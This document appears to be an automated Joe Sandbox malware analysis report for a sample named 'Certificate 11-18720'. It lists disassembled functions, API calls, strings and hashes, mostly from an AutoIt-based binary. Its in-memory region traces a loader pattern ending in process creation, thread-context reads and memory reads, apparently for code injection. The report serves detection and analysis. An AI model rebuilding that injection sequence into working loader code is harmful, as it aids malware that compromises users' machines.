                                                                                    control_flow_graph 1262 f46398-f4650b call f43fe8 call f46288 CreateFileW 1269 f46512-f46522 1262->1269 1270 f4650d 1262->1270 1273 f46524 1269->1273 1274 f46529-f46543 VirtualAlloc 1269->1274 1271 f465c2-f465c7 1270->1271 1273->1271 1275 f46545 1274->1275 1276 f46547-f4655e ReadFile 1274->1276 1275->1271 1277 f46560 1276->1277 1278 f46562-f4659c call f462c8 call f45288 1276->1278 1277->1271 1283 f4659e-f465b3 call f46318 1278->1283 1284 f465b8-f465c0 ExitProcess 1278->1284 1283->1284 1284->1271
                                                                                    APIs
                                                                                      • Part of subcall function 00F46288: Sleep.KERNELBASE(000001F4), ref: 00F46299
                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00F464FE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703940394.0000000000F43000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F43000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f43000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFileSleep
                                                                                    • String ID: WGFCG22Y280QZELC5BHDJI
                                                                                    • API String ID: 2694422964-2246859810
                                                                                    • Opcode ID: 2cc154d5b071414317a25b8f645680162fe7c97080210d36ff2d9d2379e20b92
                                                                                    • Instruction ID: 6a248f3479ca8373fbcfd6affd94e20d61d8e46c7a9162981983509f751d2bdd
                                                                                    • Opcode Fuzzy Hash: 2cc154d5b071414317a25b8f645680162fe7c97080210d36ff2d9d2379e20b92
                                                                                    • Instruction Fuzzy Hash: 20619031E04248DBEF11DBA4D844BEEBB75AF19304F044199E648BB2C1D7BA0F45CBA6
                                                                                    Function 005C4A30 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 138COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 005C5374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00681148,?,005C61FF,?,00000000,00000001,00000000), ref: 005C5392
                                                                                      • Part of subcall function 005C49FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 005C4A1D
                                                                                    • _wcscat.LIBCMT ref: 00632D80
                                                                                    • _wcscat.LIBCMT ref: 00632DB5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscat$FileModuleNameOpen
                                                                                    • String ID: 8!h$\$\Include\
                                                                                    • API String ID: 3592542968-1035270185
                                                                                    • Opcode ID: 73fc54c01276072c2ddad87bc415855bdbca8087f1f7c8e2575b07d81c6413af
                                                                                    • Instruction ID: 9698b970a08e5118d85f20612d9350af2a128d9b928f5dbd0b6831368697334a
                                                                                    • Opcode Fuzzy Hash: 73fc54c01276072c2ddad87bc415855bdbca8087f1f7c8e2575b07d81c6413af
                                                                                    • Instruction Fuzzy Hash: 2B51A675404342AFC714EF95D9A999ABBF6FF99300F50162EF7C883261DB309A48CB51
                                                                                    Function 005C51AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 005C522F
                                                                                    • _wcscpy.LIBCMT ref: 005C5283
                                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 005C5293
                                                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00633CB0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                                    • String ID: Line:
                                                                                    • API String ID: 1053898822-1585850449
                                                                                    • Opcode ID: 2f88febde1040836793fa049a48f2953ca8dd796a58cea82e380aa2b308336f0
                                                                                    • Instruction ID: d5f2994ab31a0dac80ab791da7c1b0361672c99552b8aa8762e7a7d44475d8b4
                                                                                    • Opcode Fuzzy Hash: 2f88febde1040836793fa049a48f2953ca8dd796a58cea82e380aa2b308336f0
                                                                                    • Instruction Fuzzy Hash: 9031AF71408741AED320EBE0DC4AFDA7BDCBB85310F00461EF5C996191EFB0A689CB96
                                                                                    Function 005C4139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005C41A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,005C39FE,?,00000001), ref: 005C41DB
                                                                                    • _free.LIBCMT ref: 006336B7
                                                                                    • _free.LIBCMT ref: 006336FE
                                                                                      • Part of subcall function 005CC833: __wsplitpath.LIBCMT ref: 005CC93E
                                                                                      • Part of subcall function 005CC833: _wcscpy.LIBCMT ref: 005CC953
                                                                                      • Part of subcall function 005CC833: _wcscat.LIBCMT ref: 005CC968
                                                                                      • Part of subcall function 005CC833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 005CC978
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                    • API String ID: 805182592-1757145024
                                                                                    • Opcode ID: 2f1928ead3cadb2c8393fb5b33376af25ed6e393c4032dd561d00e9e3427db0f
                                                                                    • Instruction ID: 2ef7be111308f2cfc5502c10f150c4aa07bc68ed13a39a51e196ca550d345110
                                                                                    • Opcode Fuzzy Hash: 2f1928ead3cadb2c8393fb5b33376af25ed6e393c4032dd561d00e9e3427db0f
                                                                                    • Instruction Fuzzy Hash: F9913B71910229AFCF14EFA4CC56DEEBBB5BF49310F14442AF816AB391DB309A55CB90
                                                                                    Function 005C40E5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00633725
                                                                                    • GetOpenFileNameW.COMDLG32 ref: 0063376F
                                                                                      • Part of subcall function 005C660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,005C53B1,?,?,005C61FF,?,00000000,00000001,00000000), ref: 005C662F
                                                                                      • Part of subcall function 005C40A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 005C40C6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Name$Path$FileFullLongOpen_memset
                                                                                    • String ID: X$t3g
                                                                                    • API String ID: 3777226403-2505316921
                                                                                    • Opcode ID: 5b6c40bf2ee39a069b5bcf2a37044e9a2369518671987f33b3ce066ab7b804cb
                                                                                    • Instruction ID: eba94c8ed0ec97e560199c525118dbd57ede0988fab8968748d9bc55cd4b6d37
                                                                                    • Opcode Fuzzy Hash: 5b6c40bf2ee39a069b5bcf2a37044e9a2369518671987f33b3ce066ab7b804cb
                                                                                    • Instruction Fuzzy Hash: 72218471A101989FCB119FD4C849BDE7FF9AF89304F008059E545AB241DBB45A89CF65
                                                                                    Function 005E34AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __getstream.LIBCMT ref: 005E34FE
                                                                                      • Part of subcall function 005E7C0E: __getptd_noexit.LIBCMT ref: 005E7C0E
                                                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 005E3539
                                                                                    • __wopenfile.LIBCMT ref: 005E3549
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                                    • String ID: <G
                                                                                    • API String ID: 1820251861-2138716496
                                                                                    • Opcode ID: 0910855d8102429ad43b44581be69bacece48fcd3510f6c85a861b1059a1614e
                                                                                    • Instruction ID: 3921282f4cbcea5b092ed4c538d3c1ce2f3a59b6c6512640a00372c51bc566cb
                                                                                    • Opcode Fuzzy Hash: 0910855d8102429ad43b44581be69bacece48fcd3510f6c85a861b1059a1614e
                                                                                    • Instruction Fuzzy Hash: 2911EB71900347DADB19BF738C4A66E3FE4BF85350F158925E459DB2C1EB30CA019761
                                                                                    Function 005DD298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,005DD28B,SwapMouseButtons,00000004,?), ref: 005DD2BC
                                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,005DD28B,SwapMouseButtons,00000004,?,?,?,?,005DC865), ref: 005DD2DD
                                                                                    • RegCloseKey.KERNELBASE(00000000,?,?,005DD28B,SwapMouseButtons,00000004,?,?,?,?,005DC865), ref: 005DD2FF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseOpenQueryValue
                                                                                    • String ID: Control Panel\Mouse
                                                                                    • API String ID: 3677997916-824357125
                                                                                    • Opcode ID: 9efc41755067ddf8bc4b773561de95496a1cdb74b657202df5f624cbfbb8ca53
                                                                                    • Instruction ID: 38bd75ef635335855e2e499fb54bb2e38a112d77db3ed7af23733562456c8086
                                                                                    • Opcode Fuzzy Hash: 9efc41755067ddf8bc4b773561de95496a1cdb74b657202df5f624cbfbb8ca53
                                                                                    • Instruction Fuzzy Hash: 97113979A11208BFDB208FA8CC84EEF7BB8FF45744F10486AE805D7210E631AE419B60
                                                                                    Function 00F45288 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 00F45A43
                                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00F45AD9
                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00F45AFB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703940394.0000000000F43000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F43000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f43000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                    • String ID:
                                                                                    • API String ID: 2438371351-0
                                                                                    • Opcode ID: d21c280c783bbae91a429f84d87e257f256d4475b71677e5b67df5fe47b3db5a
                                                                                    • Instruction ID: 22ec2b74e73b12799654807e43be5b49e39af5df7ec0bd9cf60977219d3a436f
                                                                                    • Opcode Fuzzy Hash: d21c280c783bbae91a429f84d87e257f256d4475b71677e5b67df5fe47b3db5a
                                                                                    • Instruction Fuzzy Hash: 91622930E146189BEB24DFA4CC40BDEB772EF58700F1091A9D50DEB291E77A9E80DB59
                                                                                    Function 0060C396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005C4517: _fseek.LIBCMT ref: 005C452F
                                                                                      • Part of subcall function 0060C56D: _wcscmp.LIBCMT ref: 0060C65D
                                                                                      • Part of subcall function 0060C56D: _wcscmp.LIBCMT ref: 0060C670
                                                                                    • _free.LIBCMT ref: 0060C4DD
                                                                                    • _free.LIBCMT ref: 0060C4E4
                                                                                    • _free.LIBCMT ref: 0060C54F
                                                                                      • Part of subcall function 005E1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,005E7A85), ref: 005E1CB1
                                                                                      • Part of subcall function 005E1C9D: GetLastError.KERNEL32(00000000,?,005E7A85), ref: 005E1CC3
                                                                                    • _free.LIBCMT ref: 0060C557
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                    • String ID:
                                                                                    • API String ID: 1552873950-0
                                                                                    • Opcode ID: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
                                                                                    • Instruction ID: 449f1d9f11319794e4bfe621cd1307cdc29c388560a2da757af40d9838a7a4fc
                                                                                    • Opcode Fuzzy Hash: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
                                                                                    • Instruction Fuzzy Hash: C5516EB1904219AFDF199F64DC85BAEBBB9FF48314F10409EB249E3281DB715E908F58
                                                                                    Function 005DEB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 005DEBB2
                                                                                      • Part of subcall function 005C51AF: _memset.LIBCMT ref: 005C522F
                                                                                      • Part of subcall function 005C51AF: _wcscpy.LIBCMT ref: 005C5283
                                                                                      • Part of subcall function 005C51AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 005C5293
                                                                                    • KillTimer.USER32(?,00000001,?,?), ref: 005DEC07
                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 005DEC16
                                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00633C88
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                    • String ID:
                                                                                    • API String ID: 1378193009-0
                                                                                    • Opcode ID: bf61db7e671b9551dcd5bba4c6ba21fcbe790fbcb6809ffe79f1a469b8cee6c9
                                                                                    • Instruction ID: eb4783b2691352a11ef07c797ba525fab21a1105a218b82b1c96cebd12cabb69
                                                                                    • Opcode Fuzzy Hash: bf61db7e671b9551dcd5bba4c6ba21fcbe790fbcb6809ffe79f1a469b8cee6c9
                                                                                    • Instruction Fuzzy Hash: BC21DA74904794AFE7339B288C59BE7BFEDAB01308F04144EE68A5A341C7742A85CB51
                                                                                    Function 0060C71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 0060C72F
                                                                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0060C746
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Temp$FileNamePath
                                                                                    • String ID: aut
                                                                                    • API String ID: 3285503233-3010740371
                                                                                    • Opcode ID: e4362dd6768a1bfac36492a1b960edfed7f655459c2e60da8154a6a5bc27d675
                                                                                    • Instruction ID: f2b6ce18b13820c8dc09ff4086cd9af2798897efa5ce376dd54dff4a50533f77
                                                                                    • Opcode Fuzzy Hash: e4362dd6768a1bfac36492a1b960edfed7f655459c2e60da8154a6a5bc27d675
                                                                                    • Instruction Fuzzy Hash: CAD05E7590030EABDB50ABA0DC0EF8B776D9700704F0001A0B754A50B1DAF0E7998B55
                                                                                    Function 0061F8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0226c177bb2236cb851a4041daeb658e9be4142e1915579509c7bf38faac82be
                                                                                    • Instruction ID: 691f9e1a8294460a3814dca4ae0e131a50a94c174d2bbb555348b9bc6327d35d
                                                                                    • Opcode Fuzzy Hash: 0226c177bb2236cb851a4041daeb658e9be4142e1915579509c7bf38faac82be
                                                                                    • Instruction Fuzzy Hash: CFF15C716083019FC714DF28C485BAABBE6BF88314F14892EF9959B392D731E945CF82
                                                                                    Function 005C4FFC Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 005C5022
                                                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 005C50CB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconNotifyShell__memset
                                                                                    • String ID:
                                                                                    • API String ID: 928536360-0
                                                                                    • Opcode ID: 0564e70a08236ab30691e91ed03dd639c85b460c810904c869b69c1ae5903bd6
                                                                                    • Instruction ID: abb70ecdaa0355a165434f1390ceba58f8f2e726487651096abc016ecf063ea4
                                                                                    • Opcode Fuzzy Hash: 0564e70a08236ab30691e91ed03dd639c85b460c810904c869b69c1ae5903bd6
                                                                                    • Instruction Fuzzy Hash: 7531BFB0504701DFC320DFA4D848B9BBBE8FF49304F00192EE59AD7240E7716984CB92
                                                                                    Function 005E395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __FF_MSGBANNER.LIBCMT ref: 005E3973
                                                                                      • Part of subcall function 005E81C2: __NMSG_WRITE.LIBCMT ref: 005E81E9
                                                                                      • Part of subcall function 005E81C2: __NMSG_WRITE.LIBCMT ref: 005E81F3
                                                                                    • __NMSG_WRITE.LIBCMT ref: 005E397A
                                                                                      • Part of subcall function 005E821F: GetModuleFileNameW.KERNEL32(00000000,00680312,00000104,00000000,00000001,00000000), ref: 005E82B1
                                                                                      • Part of subcall function 005E821F: ___crtMessageBoxW.LIBCMT ref: 005E835F
                                                                                      • Part of subcall function 005E1145: ___crtCorExitProcess.LIBCMT ref: 005E114B
                                                                                      • Part of subcall function 005E1145: ExitProcess.KERNEL32 ref: 005E1154
                                                                                      • Part of subcall function 005E7C0E: __getptd_noexit.LIBCMT ref: 005E7C0E
                                                                                    • RtlAllocateHeap.NTDLL(00F00000,00000000,00000001,00000001,00000000,?,?,005DF507,?,0000000E), ref: 005E399F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                    • String ID:
                                                                                    • API String ID: 1372826849-0
                                                                                    • Opcode ID: 8e74673d30e7bb387eb006c758fbd542c88e1f85f21fa5bbce12752d88b94515
                                                                                    • Instruction ID: 28cad02e4baedcd65400b8559ca8373fe276f04dc32b3e9fc6d02e254ca5eb6b
                                                                                    • Opcode Fuzzy Hash: 8e74673d30e7bb387eb006c758fbd542c88e1f85f21fa5bbce12752d88b94515
                                                                                    • Instruction Fuzzy Hash: F501DB352456825AEB1D3F27DC4E63D2F48BBC1710F211525F589DB193DBB09D008664
                                                                                    Function 0060C6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0060C385,?,?,?,?,?,00000004), ref: 0060C6F2
                                                                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0060C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0060C708
                                                                                    • CloseHandle.KERNEL32(00000000,?,0060C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0060C70F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
